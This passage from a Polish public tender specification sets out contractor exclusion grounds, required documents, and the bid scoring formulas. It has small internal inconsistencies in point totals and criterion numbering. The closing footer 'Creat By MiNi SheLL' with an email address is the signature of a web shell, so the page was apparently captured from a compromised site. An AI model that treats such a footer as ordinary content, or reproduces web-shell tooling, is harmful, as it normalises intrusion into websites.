1) w stosunku do którego otwarto likwidację, w zatwierdzonym przez sąd układzie w postępowaniu restrukturyzacyjnym jest przewidziane zaspokojenie wierzycieli przez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust. 1 ustawy z dnia 15 maja 2015 r.  Prawo restrukturyzacyjne (Dz. U. z 2015 r. poz. 978, 1259, 1513, 1830 i 1844 oraz z 2016 r. poz. 615) lub którego upadłość ogłoszono, z wyjątkiem wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust. 1 ustawy z dnia 28 lutego 2003 r.  Prawo upadłościowe (Dz. U. z 2015 r. poz. 233, 978, 1166, 1259 i 1844 oraz z 2016 r. poz. 615);
2) który w sposób zawiniony poważnie naruszył obowiązki zawodowe, co podważa jego uczciwość, w szczególności gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą stosownych środków dowodowych;
3) jeżeli wykonawca lub osoby, o których mowa w art. 24 ust. 1 pkt 14 ustawy, uprawnione do reprezentowania wykonawcy pozostają w relacjach określonych w art. 17 ust. 1 pkt 24 ustawy z:
a) zamawiającym,
b) osobami uprawnionymi do reprezentowania zamawiającego,
c) członkami komisji przetargowej,
d) osobami, które złożyły oświadczenie, o którym mowa w art. 17 ust. 2a ustawy
 chyba że jest możliwe zapewnienie bezstronności po stronie zamawiającego w inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu;
4) który, z przyczyn leżących po jego stronie, nie wykonał albo nienależycie wykonał w istotnym stopniu wcześniejszą umowę w sprawie zamówienia publicznego lub umowę koncesji, zawartą z zamawiającym, o którym mowa w art. 3 ust. 1 pkt 14, co doprowadziło do rozwiązania umowy lub zasądzenia odszkodowania;
5) będącego osobą fizyczną, którego prawomocnie skazano za wykroczenie przeciwko prawom pracownika lub wykroczenie przeciwko środowisku, jeżeli za jego popełnienie wymierzono karę aresztu, ograniczenia wolności lub karę grzywny nie niższą niż 3000 złotych;
6) jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce jawnej lub partnerskiej albo komplementariusza w spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie skazano za wykroczenie, o którym mowa w pkt 5 powyżej;
7) wobec którego wydano ostateczną decyzję administracyjną o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym, jeżeli wymierzono tą decyzją karę pieniężną nie niższą niż 3000 złotych;
8) który naruszył obowiązki dotyczące płatności podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, co zamawiający jest w stanie wykazać za pomocą stosownych środków dowodowych, z wyjątkiem przypadku, o którym mowa w art. 24 ust. 1 pkt 15 ustawy, chyba że wykonawca dokonał płatności należnych podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności.
5.	W celu potwierdzenia spełniania warunków udziału w postępowaniu przez Wykonawców składających wspólną ofertę:
5.1.	spełnienie warunku określonego przez Zamawiającego w pkt 1 ppkt 1.1.1.  1.1.3. z uwzględnieniem wymagań o których mowa w pkt. 2   będzie oceniane łącznie, dla wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;
5.2.	przesłanka nie podlegania wykluczeniu z postępowania, określona w pkt 3. i 4., oceniana będzie odrębnie dla każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
6.	Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie informacji zawartych w oświadczeniach i dokumentach. 
7.	Ocena spełniania warunków wymaganych od Wykonawców nastąpi wg formuły: spełnia  nie spełnia.
8.	Zamawiający uwzględniając art. 24aa ustawy przewiduje, że w przedmiotowym postępowaniu może najpierw dokonać oceny ofert, a następnie zbadać czy wykonawca, którego oferta została oceniona najwyżej w rankingu ofert, nie podlega wykluczeniu oraz spełnia warunki udziału w postepowaniu.

II.	WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIE PODLEGANIA WYKLUCZENIU Z UDZIAŁU W POSTĘPOWANIU
1.	W celu potwierdzenia niepodlegania wykluczeniu oraz spełniania warunków udziału w postępowaniu wraz z ofertą Wykonawca zobowiązany jest złożyć:
1.1.	Aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 25a ust. 1 ustawy, że wykonawca nie podlega wykluczeniu z udziału w postępowaniu oraz spełnia warunki udziału w postępowaniu  opracowane wg druków dołączonych do SIWZ  Załącznik nr 7 i Załącznik nr 8 SIWZ; 
1.2.	W przypadku Wykonawcy, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w pkt. 1.1.
1.3.	Jeżeli Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu zamieszcza informacje o podwykonawcach w oświadczeniach, o których mowa w pkt. 1.1. 
1.4.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.
1.5.	Jeżeli Wykonawca, w celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których mowa w rozdz. V. pkt 1 ppkt. 1.1. oraz pkt. 2  SIWZ, polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, musi udowodnić  Zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów umożliwiającymi należyte wykonanie zamówienia, w szczególności przedstawiając Zamawiającemu zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zamawiający w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wymaga przedstawienia dokumentu potwierdzającego:
1.5.1.	zakres dostępnych Wykonawcy zasobów innego podmiotu,
1.5.2.	sposób wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia,
1.5.3.	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia,
1.5.4.	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.
Dokument, o którym mowa powyżej, może stanowić pisemne zobowiązanie podmiotu trzeciego udostępniającego niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia, z zastrzeżeniem, że musi wskazywać elementy o których mowa w ppkt 1.5.1.  1.5.4.
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1b ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 22a ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający wymaga od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 3 pkt 3.1.  3.5. poniżej.
2.	WYKAZ DOKUMENTÓW I OŚWIADCZEŃ na potwierdzenie spełniania warunków udziału w postępowaniu, opisanych w art. 22 ust. 1b ustawy. Wykonawca, którego oferta została oceniona najwyżej, obowiązany jest złożyć niżej wymienione dokumenty:
2.1.	Wykaz usług wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie  z podaniem przedmiotu usługi wartości projektu dla którego usługi te były realizowane, dat wykonania (od-do), podmiotów, na rzecz których usługi zostały wykonane (nazwa, adres i telefon)  1 egzemplarz, datowany i odpowiednio podpisany - opracowany wg druku dołączonego do  specyfikacji - Załącznik nr 4 do SIWZ.
2.1.1.	UWAGA: W związku z określeniem w rozdziale V pkt 2 ppkt 2.2 pppkt  2.2.1. SIWZ zakresu usług koniecznych do wykazania spełniania warunku udziału w postępowaniu w zakresie zdolności zawodowej, Wykonawca obowiązany jest w ww. Wykazie podać również informacje o wykonanych w okresie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie co najmniej trzech (3) studium  wykonalności każde dla projektu inwestycyjnego o wartości powyżej 25 mln EUR .
2.2.	Dowody potwierdzające należyte wykonanie usług uwzględnionych w wykazie, o którym mowa w pkt 2 ppkt 2.1 powyżej. Dowodami są:
a)	referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, z tym że w odniesieniu do nadal wykonywanych usług dokumenty te powinny być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
b)	inne dokumenty  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać dokumentów, o których mowa w lit. a) powyżej.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego zostały wcześniej wykonane usługi wskazane w wykazie, o którym mowa w pkt 2 ppkt 2.1. powyżej, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 2 ppkt 2.2.
2.3.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich, doświadczenia oraz informacją o podstawie do dysponowania tymi osobami - opracowany wg druku dołączonego do  specyfikacji - Załącznik nr 5 do SIWZ;
UWAGA: W związku z określeniem w rozdziale V pkt 2 ppkt 2.2 pppkt  2.2.2. SIWZ min. Wymagań w zakresie osób jakie muszą być skierowane przez Wykonawcę do realizacji zamówienia i wymaganego ich doświadczenia do wykazania spełniania warunku udziału w postępowaniu w zakresie zdolności zawodowej, Wykonawca obowiązany jest w ww. Wykazie podać również informację na temat osób jakie zostaną skierowane przez Wykonawcę do realizacji zamówienia tj.  Kierownika projektu; Zastępcy Kierownika projektu ds. analiz finansowych  oraz Zastępcy Kierownika ds. analiz środowiskowych, wraz z podaniem Imienia i Nazwiska osoby oraz posiadanego doświadczenia.
2.4.	Kopię polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 400 000 zł (słownie: czterysta tysięcy  złotych), ważną w terminie składania ofert; 
3.	WYKAZ DOKUMENTÓW I OŚWIADCZEŃ na potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 5 ustawy. Wykonawca, którego oferta została oceniona najwyżej, obowiązany jest złożyć niżej wymienione dokumenty,  składa:
3.1.	Informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;
Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokument, o którym mowa w pkt 4 ppkt. 4.1.1., w zakresie określonym w art. 24 ust. 1 pkt 14 i 21 oraz ust. 5 pkt. 6 ustawy. Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.2.	Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy
3.3.	Oświadczenie Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
3.4.	Oświadczenie Wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy;
3.5.	Oświadczenie Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);
Jeżeli Wykonawca powołuje się na oświadczenia lub dokumenty o których mowa powyżej , będące w posiadaniu Zamawiającego, potwierdzające  okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3, zaleca się wskazanie w ofercie informacji czy Zamawiający jest w posiadaniu oświadczeń lub dokumentów dotyczących Wykonawcy (z podaniem numeru i nazwy postępowania Zamawiającego, w którym powyższe dokumenty zostały złożone) lub wskazanie nazwy ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (ze wskazaniem adresu internetowego, wydającego urzędu lub organu, z dokładnymi danymi referencyjnymi dokumentacji).

3.6.	Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej  opracowane wg druku dołączonego do SIWZ  Załącznik nr 6 do SIWZ. 
Uwaga: Wykonawca zobowiązany jest do przekazania Zamawiającemu  Oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej  w terminie 3 dni od dnia  zamieszczenia przez Zamawiającego na stronie internetowej informacji, o których mowa w art. 86 ust. 5 ustawy.  
W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie.

4.	WYKONAWCA MAJĄCY SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA POZA TERYTORIUM RZECZYPOSPOLITEJ POLSKIEJ
4.1.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 3:
4.1.1.	pkt 3.1.  składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny ważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy;
4.1.2.	pkt 3.2.  3.4.  składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości.
4.2.	Dokumenty, o których mowa w ppkt  4.1.1.  oraz ppkt  4.1.2. lit. b), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ppkt  4.1.2. lit. a), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.3.	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. 4.1., zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis ust. 4.2. stosuje się. 
4.4.	W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
5.	REPREZENTACJA I PEŁNOMOCNICTWO
5.1.	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo podpisane przez osoby uprawnione do reprezentowania Wykonawcy. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres umocowania). Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem. 
5.2.	W przypadku Wykonawców składających wspólną ofertę, do oferty należy dołączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wystawione zgodnie z art. 23 ust. 2 ustawy). Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres umocowania). Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.
5.3.	Oferta musi być podpisana przez pełnomocnika/osobę umocowaną do reprezentowania Wykonawcy/Wykonawców
III. 	OPIS KRYTERIÓW OCENY OFERT ORAZ SPOSÓB OCENY OFERT
	
Kryteria oceny ofert: 

KRYTERIUM										            WAGA
Nr 1  Cena oferty  - 										    55 %
Nr 2  doświadczenie wyznaczonego do realizacji zamówienia Kierownika projektu - 		    15 %
Nr 3  doświadczenie wyznaczonego do realizacji zamówienia Zastępcy Kierownika projektu ds. analiz finansowych 										            15 %
Nr 4  	doświadczenie wyznaczonego do realizacji zamówienia Zastępcy Kierownika projektu ds. analiz środowiskowych                                                                                      15%		
	 
Sposób obliczania wartości punktowej oferty
Oceny oferty dokonuje Komisja.
Wartość punktowa kryterium nr 1  Cena brutto (C) jest wyliczana wg wzoru:
"
" "C"="CN" /"COB"   " x 55 pkt." 
 gdzie:	
C  ilość punktów przyznanych ofercie
CN  najniższa zaoferowana cena
COB  cena zaoferowana w ofercie badanej

UWAGA - W przypadku oferty złożonej przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej Zamawiający dla celów porównania ofert i oceny według powyższego kryterium cenę takiej oferty powiększy o wymagany w Polsce podatek od towarów i usług (VAT) oraz cło, które miałby obowiązek w wysokości zgodnej ze stanem prawnym w tym zakresie.
 Maksymalna liczba punktów jaką może uzyskać oferta w kryterium oceny ofert jakim jest Cena brutto wynosi  50 pkt


Wartość punktowa kryterium nr 2  doświadczenie wyznaczonego do realizacji zamówienia Kierownika projektu:
W niniejszym kryterium Zamawiający przyzna maksymalnie 15 punktów za największe doświadczenie w zakresie wykonanych w okresie ostatnich pięciu lat studiów wykonalności każde dla infrastrukturalnego projektu inwestycyjnego o wartości powyżej 25 mln EUR.
Wartość punktowa w tym kryterium będzie wyliczana według wzoru:

"DKp"="DKpOB" /"DKpN"   " x 15 pkt." 
gdzie:	
DKp  ilość punktów przyznanych ofercie w kryterium doświadczenie wyznaczonego do realizacji zamówienia Kierownika projektu
DKpN  największe  wykazane doświadczenie 
DKpOB  doświadczenie wykazane w ofercie badanej

Dla oceny w niniejszym kryterium będzie brane wyłącznie doświadczenie wykraczające poza warunek udziału w postępowaniu o którym mowa w rozdziale V pkt. 2 ppkt. 2.2.2.1
Wartość punktowa kryterium nr 3  doświadczenie wyznaczonego do realizacji zamówienia Zastępcy Kierownika projektu ds. analiz finansowych:
W niniejszym kryterium Zamawiający przyzna maksymalnie 15 punktów za największe doświadczenie w zakresie wykonanych w okresie ostatnich pięciu lat analiz finansowych z zastosowaniem metodologii wymaganej przez KE w zakresie analizy kosztów i korzyści oraz analizy finansowej każda dla infrastrukturalnego projektu inwestycyjnego o wartości powyżej 25 mln EUR.
Wartość punktowa w tym kryterium będzie wyliczana według wzoru:

"DZKf"="DZKfOB" /"DZKfN"   " x 15 pkt." 
gdzie:	
DZKf ilość punktów przyznanych ofercie w kryterium doświadczenie wyznaczonego do realizacji zamówienia zastępcy Kierownika projektu ds. analiz finansowych
DZKfN  największe  wykazane doświadczenie 
DZKpOB  doświadczenie wykazane w ofercie badanej

Dla oceny w niniejszym kryterium będzie brane wyłącznie doświadczenie wykraczające poza warunek udziału w postępowaniu o którym mowa w rozdziale V pkt. 2 ppkt. 2.2.2.2.

Wartość punktowa kryterium nr 3  doświadczenie wyznaczonego do realizacji zamówienia Zastępcy Kierownika projektu ds. analiz środowiskowych:
W niniejszym kryterium Zamawiający przyzna maksymalnie 15 punktów za największe doświadczenie w zakresie wykonanych w okresie ostatnich pięciu lat opracowań każde dla projektu przekraczającego 25 mln EUR: raportów oddziaływania na środowisko sporządzonych w ramach ocen oddziaływania przedsięwzięcia na środowisko lub prognoz oddziaływania na środowisko sporządzonych w ramach strategicznych ocen oddziaływania na środowisko.
Wartość punktowa w tym kryterium będzie wyliczana według wzoru:

"DZKś"="DZKśOB" /"DZKśN"   " x 15 pkt." 
gdzie:	
DZKś ilość punktów przyznanych ofercie w kryterium doświadczenie wyznaczonego do realizacji zamówienia zastępcy Kierownika projektu ds. analiz środowiskowych
DZKśN  największe  wykazane doświadczenie 
DZKśOB  doświadczenie wykazane w ofercie badanej

Dla oceny w niniejszym kryterium będzie brane wyłącznie doświadczenie wykraczające poza warunek udziału w postępowaniu o którym mowa w rozdziale V pkt. 2 ppkt. 2.2.2.3.

	
W przypadku wskazania minimalnego  wymaganego doświadczenia dla tych osób określonego w ramach warunku  dotyczącego zdolności technicznej lub zawodowej Wykonawcy, otrzyma w niniejszym kryterium 0 pkt. 


Maksymalna łączna liczba punktów jaką może uzyskać oferta w wyniku zsumowania punktów przyznanych w poszczególnych kryteriach wynosi 100 pkt. 

Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria.
Punkty będą liczone z dokładnością do dwóch (2) miejsc po przecinku, stosując powszechne zasady zaokrąglania. 

</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com